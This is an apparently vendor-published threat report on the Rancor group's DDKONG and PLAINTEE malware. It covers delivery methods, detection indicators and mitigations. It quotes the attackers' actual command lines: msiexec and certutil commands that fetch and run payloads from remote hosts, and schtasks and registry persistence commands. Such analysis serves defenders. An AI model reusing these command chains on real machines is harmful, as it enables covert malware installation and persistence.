The Rancor Hacking Group

The Rancor group is involved in highly targeted attacks, which are focused in South East Asia; specifically, in Singapore and Cambodia.  Rancor uses two major Windows malware families named, “DDKONG” and “PLAINTEE”.[1]

Rancor, a previously unidentified group, delivers malware using three different technical methods:

  • Microsoft Excel Document with embedded malicious macros
  • HTML Application file, most likely delivered by email attachment
  • DLL Loader


Although no malicious email messages were observed, observation of decoy files present on infected systems suggest delivery is achieved using email attachments. The decoy documents are often downloaded from a legitimate, but compromised, website to divert suspicion of malware infection by displaying relevant regional news.

Details:

Both the DDKONG and PLAINTEE malware families are distributed as custom DLLs with a plugin architecture that allows attackers to expand and modify its functionality. Example payloads observed involved viewing host network configuration, listing, uploading, and downloading files on infected Windows hosts.

DDKONG creates a named event, “RunOnce”, which can be used to detect infection. It communicates with a command and control (C2) server to receive the plugins.

PLAINTEE uses a custom protocol for its C2 communications and creates s mutex named “microsoftfuckedupb” which could be used to detect infection.

Mitigation at the delivery phase can be achieved by changing or disabling the Windows default “.hta” file handler and exercising caution when opening emails with Microsoft Office document attachments that require macros enabled.

Origin and Targets:

The group has been targeting political entities in Singapore and Cambodia. Especially non-tech individuals in highly targeted campaigns. It is believed that the Chinese cyber espionage group DragonOK is behind RANCHOR. DragonOK has been involved in various campaigns in the past including the KHRAT trjoan.

Rancor Delivery and Loading Mechanisms

Type 1 – Delivery using document property macro:

One of Rancor’s delivery methods is to leverage a Microsoft Office Excel document with an embedded macro to launch their malware.  The main malicious code is embedded in the EXIF metadata property of the document.  The main content of the macro itself is relatively simple (see Figure 1.).  Yet, the small foot print of the malicious code prevents detection by automated systems that scan macro content.

Figure 1. Malicious Macro Code

The “Company” field contains the raw commands necessary to download and execute the next stage of the malware:

cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /I

http://199.247.6.253/ud^",false,0 <nul >

C:\Windows\System32\spool\drivers\color\tmp.vbs & schtasks /create /sc MINUTE

/tn "Windows System" /tr "C:\Windows\System32\spool\drivers\color\tmp.vbs"

/mo 2 /F & schtasks /create /sc MINUTE /tn "Windows System" /tr

"C:\Windows\System32\spool\drivers\color\tmp.vbs" /mo 2 /RU SYSTEM /c set

/p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i

http://199.247.6.253/ud^",false,0 <nul >

C:\Windows\System32\spool\drivers\color\tmp.vbs & schtasks /create /sc MINUTE

/tn "Windows System" /tr "C:\Windows\System32\spool\drivers\color\tmp.vbs"

/mo 2 /F & schtasks /create /sc MINUTE /tn "Windows System" /tr

"C:\Windows\System32\spool\drivers\color\tmp.vbs" /mo 2 /RU SYSTEM

Type 2 – Delivery using HTA Loader

Figure 2. Loaded Image File

The HTA Loader delivery method involves Rancor attackers sending an email with attached HTML Application file.  When opened and executed, the key components of the HTA file downloads and executes additional malware components from a remote URL.  The malware also loads a decoy image file, hosted externally (Figure 2).

Type 3 – Delivery via DLL Loader

There are three different Rancor DLL loaders.  The loaders contain a single exported function and will execute a single command.  The sample command is shown below:

http:\\dlj40s.jdanief[.]xyz/images/word3.doc",0

>%userProfile%\AppData\Local\Microsoft\microsoft.vbs /c Echo

CreateObject("WScript.Shell").Run "msiexec /q /i

http:\\dlj40s.jdanief[.]xyz/images/word3.doc",0

>%userProfile%\AppData\Local\Microsoft\microsoft.vbs

schtasks /create /sc MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript

%userProfile%\AppData\Local\Microsoft\microsoft.vbs" /mo 10 /F /create /sc

MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript

%userProfile%\AppData\Local\Microsoft\microsoft.vbs" /mo 10 /F

 cmd /c certutil.exe -urlcache -split -f

http:\\\\dlj40s.jdanief[.]xyz/images/1.pdf C:\ProgramData\1.pdf&start

C:\ProgramData\1.pdf /c certutil.exe -urlcache -split -f

http:\\\\dlj40s.jdanief[.]xyz/images/1.pdf C:\ProgramData\1.pdf&start

C:\ProgramData\1.pdf


The above command downloads and executes a payload and configures it for persistent execution.  In two of the three DLL Loader samples, the malware also downloads and opens a decoy PDF document, which is hosted on a legitimate but compromised website.

Payload Overview

DDKONG

The malware has three exported functions:

  • ServiceMain
  • Rundll32Call
  • DllEntryPoint

The ServiceMain exported function indicates that this DLL is expected to be loaded as a service.  If this function is successfully loaded it will spawn a new instance of itself by calling Rundll32Call using rundll32.exe.

The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time.  If this is the only instance of DDKong running at the time, the malware continues.  If not, it terminates.  This ensures that only a single instance of DDKong is executed at a given time.  It then decodes a configuration and sends a beacon to a C2 server via raw TCP.  It will then download plugins according to the C2 response.  A plugin was identified that allowed attackers to list, upload, and download files from the victim.

The DllEntryPoint exported function is the standard DLL entry point for Microsoft DLLs.

PLAINTEE

PLAINTEE uses a custom UDP protocol to communicate.  PLAINTEE contains the following exported functions:

  • Add
  • Sub
  • DllEntryPoint


The DLL expects the export named “Add” to be used when initially loaded.  When this function is executed, PLAINTEE executes the following command in a new process to add persistence:

cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\RunOnce" /v "Microsoft Audio" /t REG_SZ /d "%APPDATA%\Network

Service.exe" "[path_to_PLAINTEE]",Add /freg add

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\RunOnce" /v

"Microsoft Audio" /t REG_SZ /d "%APPDATA%\Network Service.exe"

"[path_to_PLAINTEE]",Add /f


PLAINTEE then calls the “Sub” function, which begins by spawning a mutex named “microsoftfuckedupb” to ensure only a single instance is running at a given time.  PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim.  This malware then proceeds to collect general system enumeration data about the infected machine and enters a loop - where it will decode embedded configuration data and send an initial beacon to the C2 server.  PLAINTEE communicates via a custom UDP protocol.  It expects the downloaded plugin to be a DLL with an export function of either a “shell” or “file.”  The commands “tasklist” and “ipconfig/all” were observed, whose output was sent to the remote server.

Conclusion

DDKONG and PLAINTEE malware use sophisticated methods which show how techniques have evolved over time.  Notably the PLAINTEE malware’s use of a custom UDP protocol is rare and worth considering when building heuristics detections for this unknown malware. The group has highly developed skillset which allows it to develop such capabilities.

Our customers are advised to change or disable the default handler for “.hta” files on Windows hosts.  This will prevent Rancor from using the HTML Application File delivery method.

Caution is advised when opening email attachments, especially macro-enabled Microsoft Office documents.

For questions or comments regarding this report, please contact the Lab directly by at 603-606-1246, or feedback@wapacklabs.com

 

[1] https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

 

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!